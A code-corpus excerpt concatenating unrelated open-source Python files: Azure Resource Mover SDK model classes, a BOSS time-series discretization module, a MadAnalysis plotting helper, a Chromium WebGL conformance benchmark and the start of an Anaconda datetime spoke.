super(PublicIpReference, self).__init__(source_arm_resource_id=source_arm_resource_id, **kwargs)
class RequiredForResourcesCollection(msrest.serialization.Model):
"""Required for resources collection.
:param source_ids: Gets or sets the list of source Ids for which the input resource is
required.
:type source_ids: list[str]
"""
_attribute_map = {
'source_ids': {'key': 'sourceIds', 'type': '[str]'},
}
def __init__(
self,
*,
source_ids: Optional[List[str]] = None,
**kwargs
):
super(RequiredForResourcesCollection, self).__init__(**kwargs)
self.source_ids = source_ids
class ResourceGroupResourceSettings(ResourceSettings):
"""Defines the resource group resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(ResourceGroupResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'resourceGroups' # type: str
class ResourceMoveRequest(msrest.serialization.Model):
"""Defines the request body for resource move operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(ResourceMoveRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class SqlDatabaseResourceSettings(ResourceSettings):
"""Defines the Sql Database resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param zone_redundant: Defines the zone redundant resource setting. Possible values include:
"Enable", "Disable".
:type zone_redundant: str or ~resource_mover_service_api.models.ZoneRedundant
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'zone_redundant': {'key': 'zoneRedundant', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
zone_redundant: Optional[Union[str, "ZoneRedundant"]] = None,
**kwargs
):
super(SqlDatabaseResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Sql/servers/databases' # type: str
self.zone_redundant = zone_redundant
class SqlElasticPoolResourceSettings(ResourceSettings):
"""Defines the Sql ElasticPool resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param zone_redundant: Defines the zone redundant resource setting. Possible values include:
"Enable", "Disable".
:type zone_redundant: str or ~resource_mover_service_api.models.ZoneRedundant
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'zone_redundant': {'key': 'zoneRedundant', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
zone_redundant: Optional[Union[str, "ZoneRedundant"]] = None,
**kwargs
):
super(SqlElasticPoolResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Sql/servers/elasticPools' # type: str
self.zone_redundant = zone_redundant
class SqlServerResourceSettings(ResourceSettings):
"""Defines the SQL Server resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(SqlServerResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Sql/servers' # type: str
class SubnetReference(ProxyResourceReference):
"""Defines reference to subnet.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(SubnetReference, self).__init__(source_arm_resource_id=source_arm_resource_id, name=name, **kwargs)
class SubnetResourceSettings(msrest.serialization.Model):
"""Defines the virtual network subnets resource settings.
:param name: Gets or sets the Subnet name.
:type name: str
:param address_prefix: Gets or sets address prefix for the subnet.
:type address_prefix: str
:param network_security_group: Defines reference to NSG.
:type network_security_group: ~resource_mover_service_api.models.NsgReference
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'address_prefix': {'key': 'addressPrefix', 'type': 'str'},
'network_security_group': {'key': 'networkSecurityGroup', 'type': 'NsgReference'},
}
def __init__(
self,
*,
name: Optional[str] = None,
address_prefix: Optional[str] = None,
network_security_group: Optional["NsgReference"] = None,
**kwargs
):
super(SubnetResourceSettings, self).__init__(**kwargs)
self.name = name
self.address_prefix = address_prefix
self.network_security_group = network_security_group
class Summary(msrest.serialization.Model):
"""Summary item.
:param count: Gets the count.
:type count: int
:param item: Gets the item.
:type item: str
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
'item': {'key': 'item', 'type': 'str'},
}
def __init__(
self,
*,
count: Optional[int] = None,
item: Optional[str] = None,
**kwargs
):
super(Summary, self).__init__(**kwargs)
self.count = count
self.item = item
class SummaryCollection(msrest.serialization.Model):
"""Summary Collection.
:param field_name: Gets or sets the field name on which summary is done.
:type field_name: str
:param summary: Gets or sets the list of summary items.
:type summary: list[~resource_mover_service_api.models.Summary]
"""
_attribute_map = {
'field_name': {'key': 'fieldName', 'type': 'str'},
'summary': {'key': 'summary', 'type': '[Summary]'},
}
def __init__(
self,
*,
field_name: Optional[str] = None,
summary: Optional[List["Summary"]] = None,
**kwargs
):
super(SummaryCollection, self).__init__(**kwargs)
self.field_name = field_name
self.summary = summary
class UnresolvedDependenciesFilter(msrest.serialization.Model):
"""Unresolved dependencies contract.
:param properties: The unresolved dependencies filter properties.
:type properties: ~resource_mover_service_api.models.UnresolvedDependenciesFilterProperties
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'UnresolvedDependenciesFilterProperties'},
}
def __init__(
self,
*,
properties: Optional["UnresolvedDependenciesFilterProperties"] = None,
**kwargs
):
super(UnresolvedDependenciesFilter, self).__init__(**kwargs)
self.properties = properties
class UnresolvedDependenciesFilterProperties(msrest.serialization.Model):
"""UnresolvedDependenciesFilterProperties.
:param count: The count of the resource.
:type count: int
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
}
def __init__(
self,
*,
count: Optional[int] = None,
**kwargs
):
super(UnresolvedDependenciesFilterProperties, self).__init__(**kwargs)
self.count = count
class UnresolvedDependency(msrest.serialization.Model):
"""Unresolved dependency.
:param count: Gets or sets the count.
:type count: int
:param id: Gets or sets the arm id of the dependency.
:type id: str
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
*,
count: Optional[int] = None,
id: Optional[str] = None,
**kwargs
):
super(UnresolvedDependency, self).__init__(**kwargs)
self.count = count
self.id = id
class UnresolvedDependencyCollection(msrest.serialization.Model):
"""Unresolved dependency collection.
Variables are only populated by the server, and will be ignored when sending a request.
:param value: Gets or sets the list of unresolved dependencies.
:type value: list[~resource_mover_service_api.models.UnresolvedDependency]
:param next_link: Gets or sets the value of next link.
:type next_link: str
:ivar summary_collection: Gets or sets the list of summary items and the field on which summary
is done.
:vartype summary_collection: ~resource_mover_service_api.models.SummaryCollection
:ivar total_count: Gets the total count.
:vartype total_count: long
"""
_validation = {
'summary_collection': {'readonly': True},
'total_count': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[UnresolvedDependency]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
'summary_collection': {'key': 'summaryCollection', 'type': 'SummaryCollection'},
'total_count': {'key': 'totalCount', 'type': 'long'},
}
def __init__(
self,
*,
value: Optional[List["UnresolvedDependency"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(UnresolvedDependencyCollection, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
self.summary_collection = None
self.total_count = None
class UpdateMoveCollectionRequest(msrest.serialization.Model):
"""Defines the request body for updating move collection.
:param tags: A set of tags. Gets or sets the Resource tags.
:type tags: dict[str, str]
:param identity: Defines the MSI properties of the Move Collection.
:type identity: ~resource_mover_service_api.models.Identity
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'Identity'},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
identity: Optional["Identity"] = None,
**kwargs
):
super(UpdateMoveCollectionRequest, self).__init__(**kwargs)
self.tags = tags
self.identity = identity
class VirtualMachineResourceSettings(ResourceSettings):
"""Gets or sets the virtual machine resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param target_availability_zone: Gets or sets the target availability zone. Possible values
include: "1", "2", "3", "NA".
:type target_availability_zone: str or
~resource_mover_service_api.models.TargetAvailabilityZone
:param target_vm_size: Gets or sets the target virtual machine size.
:type target_vm_size: str
:param target_availability_set_id: Gets or sets the target availability set id for virtual
machines not in an availability set at source.
:type target_availability_set_id: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'target_availability_zone': {'key': 'targetAvailabilityZone', 'type': 'str'},
'target_vm_size': {'key': 'targetVmSize', 'type': 'str'},
'target_availability_set_id': {'key': 'targetAvailabilitySetId', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
target_availability_zone: Optional[Union[str, "TargetAvailabilityZone"]] = None,
target_vm_size: Optional[str] = None,
target_availability_set_id: Optional[str] = None,
**kwargs
):
super(VirtualMachineResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Compute/virtualMachines' # type: str
self.target_availability_zone = target_availability_zone
self.target_vm_size = target_vm_size
self.target_availability_set_id = target_availability_set_id
class VirtualNetworkResourceSettings(ResourceSettings):
"""Defines the virtual network resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param enable_ddos_protection: Gets or sets a value indicating whether the
DDOS protection should be switched on.
:type enable_ddos_protection: bool
:param address_space: Gets or sets the address prefixes for the virtual network.
:type address_space: list[str]
:param dns_servers: Gets or sets DHCPOptions that contains an array of DNS servers available to
VMs
deployed in the virtual network.
:type dns_servers: list[str]
:param subnets: Gets or sets List of subnets in a VirtualNetwork.
:type subnets: list[~resource_mover_service_api.models.SubnetResourceSettings]
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'enable_ddos_protection': {'key': 'enableDdosProtection', 'type': 'bool'},
'address_space': {'key': 'addressSpace', 'type': '[str]'},
'dns_servers': {'key': 'dnsServers', 'type': '[str]'},
'subnets': {'key': 'subnets', 'type': '[SubnetResourceSettings]'},
}
def __init__(
self,
*,
target_resource_name: str,
enable_ddos_protection: Optional[bool] = None,
address_space: Optional[List[str]] = None,
dns_servers: Optional[List[str]] = None,
subnets: Optional[List["SubnetResourceSettings"]] = None,
**kwargs
):
super(VirtualNetworkResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/virtualNetworks' # type: str
self.enable_ddos_protection = enable_ddos_protection
self.address_space = address_space
self.dns_servers = dns_servers
self.subnets = subnets
| Azure/azure-sdk-for-python | sdk/resourcemover/azure-mgmt-resourcemover/azure/mgmt/resourcemover/models/_models_py3.py | Python | mit | 93,853 |
"""
.. module:: BOSS
BOSS
*************
:Description: BOSS
:Authors: bejar
:Version:
:Created on: 15/02/2017 13:48
"""
import numpy as np
from kemlglearn.preprocessing import Discretizer
import seaborn as sn
from collections import Counter
from kemlglearn.time_series.decomposition.MFT import mft
__author__ = 'bejar'
def boss_distance(histo1, histo2):
"""
BOSS distance between two histograms
Not really a distance because it is not symmetric
:param histo1:
:param histo2:
:return:
"""
val = 0
for w in histo1:
if w in histo2:
val += (histo1[w] - histo2[w]) ** 2
else:
val += histo1[w] * histo1[w]
return val
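# A worked sketch (hypothetical word counts) of the asymmetry: only the words
# of the first histogram contribute to the sum.
#
#   h1 = {'AAB': 3, 'ABB': 1}
#   h2 = {'AAB': 1}
#   boss_distance(h1, h2)  # (3 - 1)**2 + 1**2 = 5
#   boss_distance(h2, h1)  # (1 - 3)**2 = 4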
def euclidean_distance(histo1, histo2):
"""
Squared Euclidean distance between two histograms
:param histo1:
:param histo2:
:return:
"""
val = 0
lnot = []
for w in histo1:
if w in histo2:
val += (histo1[w] - histo2[w]) ** 2
lnot.append(w)
else:
val += histo1[w] * histo1[w]
for w in histo2:
if w not in lnot:
val += histo2[w] * histo2[w]
return val
def cosine_similarity(histo1, histo2):
"""
Cosine similarity between two histograms
:param histo1:
:param histo2:
:return:
"""
val = 0.0
norm1 = 0.0
for w in histo1:
if w in histo2:
val += (histo1[w] * histo2[w])
norm1 += histo1[w] ** 2
norm2 = 0.0
for w in histo2:
norm2 += histo2[w] ** 2
return val / (np.sqrt(norm1) * np.sqrt(norm2))
def hamming_distance(histo1, histo2):
"""
L1 (Manhattan) distance between the word counts of two histograms
:param histo1:
:param histo2:
:return:
"""
val = 0
lnot = []
for w in histo1:
if w in histo2:
val += np.abs((histo1[w] - histo2[w]))
lnot.append(w)
else:
val += histo1[w]
for w in histo2:
if w not in lnot:
val += histo2[w]
return val
def bin_hamming_distance(histo1, histo2):
"""
Binary Hamming distance between two histograms: the size of the symmetric
difference of their word sets (counts are ignored)
:param histo1:
:param histo2:
:return:
"""
s1 = set(histo1.keys())
s2 = set(histo2.keys())
# symmetric difference size: |s1| + |s2| - 2 * |s1 & s2|
return len(s1) + len(s2) - 2 * len(s1.intersection(s2))
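# A worked sketch (hypothetical word sets): for key sets {'AAB', 'ABB'} and
# {'AAB', 'BBA'} the symmetric difference is {'ABB', 'BBA'}, so the distance
# is 2 + 2 - 2 * 1 = 2.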
class Boss():
"""
Computes the BOSS words for a dictionary of series
"""
def __init__(self, dseries, sampling, butfirst=False):
"""
:param dseries:
:param sampling:
"""
self.series = dseries
self.sampling = sampling
self.coefs = {}
self.codes = {}
self.butfirst = butfirst
def discretization_intervals(self, ncoef, wsize, vsize):
"""
Computes the BOSS discretization for the signals; the word length is
2*ncoef (real and imaginary parts), except if there are coefficients
that are zero
:param ncoef:
:param wsize:
:param vsize:
:return:
"""
all_coefs = []
for s in self.series:
coefs = mft(self.series[s], self.sampling, ncoef, wsize, butfirst=self.butfirst)
lcoefs = []
for i in range(coefs.shape[1]):
lcoefs.append(coefs[:, i].real)
lcoefs.append(coefs[:, i].imag)
all_coefs.append(np.stack(lcoefs, axis=-1))
self.coefs[s] = all_coefs[-1]
X = np.concatenate(all_coefs)
self.disc = Discretizer(method='frequency', bins=vsize)
self.disc.fit(X)
def discretize(self):
"""
Computes the words for each time series
:param series:
:return:
"""
vocabulary = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def word(vec):
"""
:param v:
:return:
"""
w = ''
for v in vec:
w += vocabulary[int(v)]
return w
for c in self.coefs:
sdisc = self.disc.transform(self.coefs[c], copy=True).real
prevw = word(sdisc[0])
lvoc = [prevw]
for i in range(1, sdisc.shape[0]):
nword = word(sdisc[i])
if nword != prevw:
lvoc.append(nword)
prevw = nword
self.codes[c] = Counter(lvoc)
# print(c, self.codes[c])
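# A worked sketch of the word construction (hypothetical bin indices): with
# the vocabulary above, a discretized row [0, 2, 1] becomes the word 'ACB'.
# Consecutive repeats are collapsed (numerosity reduction), so the row
# sequence [0,2,1], [0,2,1], [1,0,0] yields Counter({'ACB': 1, 'BAA': 1}).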
if __name__ == '__main__':
pass
# wlen = 64
# voclen = 3
# ncoefs = 3
#
#
# boss = Boss(dseries, 10)
# boss.discretization_intervals(ncoefs, wlen, voclen)
# boss.discretize()
| bejar/kemlglearn | kemlglearn/time_series/discretization/BOSS.py | Python | mit | 4,543 |
################################################################################
#
# Copyright (C) 2012-2013 Eric Conte, Benjamin Fuks
# The MadAnalysis development team, email: <ma5team@iphc.cnrs.fr>
#
# This file is part of MadAnalysis 5.
# Official website: <https://launchpad.net/madanalysis5>
#
# MadAnalysis 5 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MadAnalysis 5 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MadAnalysis 5. If not, see <http://www.gnu.org/licenses/>
#
################################################################################
from madanalysis.enumeration.uncertainty_type import UncertaintyType
from madanalysis.enumeration.normalize_type import NormalizeType
from madanalysis.layout.root_config import RootConfig
from madanalysis.enumeration.report_format_type import ReportFormatType
from madanalysis.enumeration.observable_type import ObservableType
from madanalysis.enumeration.color_type import ColorType
from madanalysis.enumeration.linestyle_type import LineStyleType
from madanalysis.enumeration.backstyle_type import BackStyleType
from madanalysis.enumeration.stacking_method_type import StackingMethodType
from math import sqrt
class MergingPlotsForDataset:
def __init__(self,main,dataset):
self.dataset = dataset
self.main = main
self.histos = []
def __len__(self):
return len(self.histos)
def __getitem__(self,i):
return self.histos[i]
# Computing integral
def FinalizeReading(self):
for histo in self.histos:
histo.FinalizeReading(self.main,self.dataset)
# Creating the histograms
def CreateHistogram(self):
for histo in self.histos:
histo.CreateHistogram()
| Lana-B/Pheno4T | madanalysis/layout/merging_plots_for_dataset.py | Python | gpl-3.0 | 2,345 |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import optparse
import os
import sys
import webgl_conformance_expectations
from telemetry import benchmark as benchmark_module
from telemetry.core import util
from telemetry.internal.browser import browser_finder
from telemetry.page import page as page_module
from telemetry.page import page_test
from telemetry.page import shared_page_state
from telemetry.story.story_set import StorySet
conformance_path = os.path.join(
util.GetChromiumSrcDir(),
'third_party', 'webgl', 'src', 'sdk', 'tests')
conformance_harness_script = r"""
var testHarness = {};
testHarness._allTestSucceeded = true;
testHarness._messages = '';
testHarness._failures = 0;
testHarness._finished = false;
testHarness._originalLog = window.console.log;
testHarness.log = function(msg) {
testHarness._messages += msg + "\n";
testHarness._originalLog.apply(window.console, [msg]);
}
testHarness.reportResults = function(url, success, msg) {
testHarness._allTestSucceeded = testHarness._allTestSucceeded && !!success;
if(!success) {
testHarness._failures++;
if(msg) {
testHarness.log(msg);
}
}
};
testHarness.notifyFinished = function(url) {
testHarness._finished = true;
};
testHarness.navigateToPage = function(src) {
var testFrame = document.getElementById("test-frame");
testFrame.src = src;
};
window.webglTestHarness = testHarness;
window.parent.webglTestHarness = testHarness;
window.console.log = testHarness.log;
window.onerror = function(message, url, line) {
testHarness.reportResults(null, false, message);
testHarness.notifyFinished(null);
};
"""
def _DidWebGLTestSucceed(tab):
return tab.EvaluateJavaScript('webglTestHarness._allTestSucceeded')
def _WebGLTestMessages(tab):
return tab.EvaluateJavaScript('webglTestHarness._messages')
def _CompareVersion(version1, version2):
ver_num1 = [int(x) for x in version1.split('.')]
ver_num2 = [int(x) for x in version2.split('.')]
size = min(len(ver_num1), len(ver_num2))
return cmp(ver_num1[0:size], ver_num2[0:size])
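# Worked examples: only the shared prefix of the dotted components is
# compared, so a shorter version matching that prefix compares equal.
#
#   _CompareVersion('1.0.4', '2.0.0')  # -1: [1, 0, 4] < [2, 0, 0]
#   _CompareVersion('2.0', '2.0.1')    #  0: only [2, 0] vs [2, 0] compared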
class WebglConformanceValidator(page_test.PageTest):
def __init__(self):
super(WebglConformanceValidator, self).__init__()
def ValidateAndMeasurePage(self, page, tab, results):
if not _DidWebGLTestSucceed(tab):
raise page_test.Failure(_WebGLTestMessages(tab))
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs([
'--disable-gesture-requirement-for-media-playback',
'--disable-domain-blocking-for-3d-apis',
'--disable-gpu-process-crash-limit'
])
browser = browser_finder.FindBrowser(options.finder_options)
if (browser.target_os.startswith('android') and
browser.browser_type == 'android-webview-shell'):
# TODO(kbr): this is overly broad. We'd like to do this only on
# Nexus 9. It'll go away shortly anyway. crbug.com/499928
#
# The --ignore_egl_sync_failures is only there to work around
# some strange failure on the Nexus 9 bot, not reproducible on
# local hardware.
options.AppendExtraBrowserArgs([
'--disable-gl-extensions=GL_EXT_disjoint_timer_query',
'--ignore_egl_sync_failures'
])
class Webgl2ConformanceValidator(WebglConformanceValidator):
def __init__(self):
super(Webgl2ConformanceValidator, self).__init__()
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs([
'--disable-gesture-requirement-for-media-playback',
'--disable-domain-blocking-for-3d-apis',
'--disable-gpu-process-crash-limit',
'--enable-unsafe-es3-apis'
])
class WebglConformancePage(page_module.Page):
def __init__(self, story_set, test, expectations):
super(WebglConformancePage, self).__init__(
url='file://' + test, page_set=story_set, base_dir=story_set.base_dir,
shared_page_state_class=shared_page_state.SharedDesktopPageState,
name=('WebglConformance.%s' %
test.replace('/', '_').replace('-', '_').
replace('\\', '_').rpartition('.')[0].replace('.', '_')))
self.script_to_evaluate_on_commit = conformance_harness_script
self._expectations = expectations
def RunNavigateSteps(self, action_runner):
num_tries = 1 + self._expectations.GetFlakyRetriesForPage(
self, action_runner.tab.browser)
# This loop will run once for tests that aren't marked flaky, and
# will fall through to the validator's ValidateAndMeasurePage on
# the last iteration.
for ii in xrange(0, num_tries):
super(WebglConformancePage, self).RunNavigateSteps(action_runner)
action_runner.WaitForJavaScriptCondition(
'webglTestHarness._finished', timeout_in_seconds=180)
if ii < num_tries - 1:
if _DidWebGLTestSucceed(action_runner.tab):
return
else:
print 'FLAKY TEST FAILURE, retrying: ' + self.display_name
print 'Error messages from test run:'
print _WebGLTestMessages(action_runner.tab)
class WebglConformance(benchmark_module.Benchmark):
"""Conformance with Khronos WebGL Conformance Tests"""
def __init__(self):
super(WebglConformance, self).__init__(max_failures=10)
self._cached_expectations = None
@classmethod
def Name(cls):
return 'webgl_conformance'
@classmethod
def AddBenchmarkCommandLineArgs(cls, group):
group.add_option('--webgl-conformance-version',
help='Version of the WebGL conformance tests to run.',
default='1.0.4')
group.add_option('--webgl2-only',
help='Whether we include webgl 1 tests if version is 2.0.0 or above.',
default='false')
def CreatePageTest(self, options):
if _CompareVersion(options.webgl_conformance_version, '2.0.0') >= 0:
return Webgl2ConformanceValidator()
return WebglConformanceValidator()
def CreateStorySet(self, options):
tests = self._ParseTests('00_test_list.txt',
options.webgl_conformance_version,
(options.webgl2_only == 'true'),
None)
ps = StorySet(serving_dirs=[''], base_dir=conformance_path)
expectations = self.GetExpectations()
for test in tests:
ps.AddStory(WebglConformancePage(ps, test, expectations))
return ps
def GetExpectations(self):
if not self._cached_expectations:
self._cached_expectations = (
webgl_conformance_expectations.WebGLConformanceExpectations(
conformance_path))
return self._cached_expectations
def CreateExpectations(self):
return self.GetExpectations()
@staticmethod
def _ParseTests(path, version, webgl2_only, folder_min_version):
test_paths = []
current_dir = os.path.dirname(path)
full_path = os.path.normpath(os.path.join(conformance_path, path))
if not os.path.exists(full_path):
raise Exception('The WebGL conformance test path specified ' +
'does not exist: ' + full_path)
with open(full_path, 'r') as f:
for line in f:
line = line.strip()
if not line:
continue
if line.startswith('//') or line.startswith('#'):
continue
line_tokens = line.split(' ')
test_name = line_tokens[-1]
i = 0
min_version = None
while i < len(line_tokens):
token = line_tokens[i]
if token == '--min-version':
i += 1
min_version = line_tokens[i]
i += 1
min_version_to_compare = min_version or folder_min_version
if (min_version_to_compare and
_CompareVersion(version, min_version_to_compare) < 0):
continue
if (webgl2_only and (not ('.txt' in test_name)) and
((not min_version_to_compare) or
(not min_version_to_compare.startswith('2')))):
continue
if '.txt' in test_name:
include_path = os.path.join(current_dir, test_name)
# We only check min-version >= 2.0.0 for the top level list.
test_paths += WebglConformance._ParseTests(
include_path, version, webgl2_only, min_version_to_compare)
else:
test = os.path.join(current_dir, test_name)
test_paths.append(test)
return test_paths
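# A sketch of the test-list format this parser expects (hypothetical file
# contents): each non-comment line names either another .txt list to recurse
# into or a test page, optionally gated by a --min-version token.
#
#   # 00_test_list.txt
#   conformance/00_test_list.txt
#   --min-version 2.0.0 conformance2/00_test_list.txt
#   --min-version 1.0.3 some-test.html
#   other-test.html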
| TheTypoMaster/chromium-crosswalk | content/test/gpu/gpu_tests/webgl_conformance.py | Python | bsd-3-clause | 8,433 |
# Datetime configuration spoke class
#
# Copyright (C) 2012-2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Vratislav Podzimek <vpodzime@redhat.com>
#
import logging
log = logging.getLogger("anaconda")
from gi.repository import GLib, Gdk, Gtk, TimezoneMap
from pyanaconda.ui.communication import hubQ
from pyanaconda.ui.common import FirstbootSpokeMixIn
from pyanaconda.ui.gui import GUIObject
from pyanaconda.ui.gui.spokes import NormalSpoke
from pyanaconda.ui.categories.localization import LocalizationCategory
from pyanaconda.ui.gui.utils import gtk_action_nowait, gtk_action_wait, gtk_call_once, override_cell_property
from pyanaconda.ui.gui.helpers import GUIDialogInputCheckHandler
from pyanaconda.ui.helpers import InputCheck
from pyanaconda.i18n import _, CN_
from pyanaconda.timezone import NTP_SERVICE, get_all_regions_and_timezones, get_timezone, is_valid_timezone
from pyanaconda.localization import get_xlated_timezone, resolve_date_format
from pyanaconda import iutil
from pyanaconda import isys
from pyanaconda import network
from pyanaconda import nm
from pyanaconda import ntp
from pyanaconda import flags
from pyanaconda import constants
from pyanaconda.threads import threadMgr, AnacondaThread
import datetime
import re
import threading
import locale as locale_mod
__all__ = ["DatetimeSpoke"]
SERVER_OK = 0
SERVER_NOK = 1
SERVER_QUERY = 2
DEFAULT_TZ = "America/New_York"
SPLIT_NUMBER_SUFFIX_RE = re.compile(r'([^0-9]*)([-+])([0-9]+)')
def _compare_regions(reg_xlated1, reg_xlated2):
"""Compare two pairs of regions and their translations."""
reg1, xlated1 = reg_xlated1
reg2, xlated2 = reg_xlated2
# sort the Etc timezones to the end
if reg1 == "Etc" and reg2 == "Etc":
return 0
elif reg1 == "Etc":
return 1
elif reg2 == "Etc":
return -1
else:
# otherwise compare the translated names
return locale_mod.strcoll(xlated1, xlated2)
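# A worked sketch (hypothetical translations, default C collation): 'Etc'
# always sorts last, the rest by their translated names.
#
#   regions = [('Etc', 'Etc'), ('Europe', 'Evropa'), ('Africa', 'Afrika')]
#   sorted(regions, cmp=_compare_regions)
#   # -> [('Africa', 'Afrika'), ('Europe', 'Evropa'), ('Etc', 'Etc')]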
def _compare_cities(city_xlated1, city_xlated2):
"""Compare two paris of cities and their translations."""
# if there are "cities" ending with numbers (like GMT+-X), we need to sort
# them based on their numbers
val1 = city_xlated1[1]
val2 = city_xlated2[1]
match1 = SPLIT_NUMBER_SUFFIX_RE.match(val1)
match2 = SPLIT_NUMBER_SUFFIX_RE.match(val2)
if match1 is None and match2 is None:
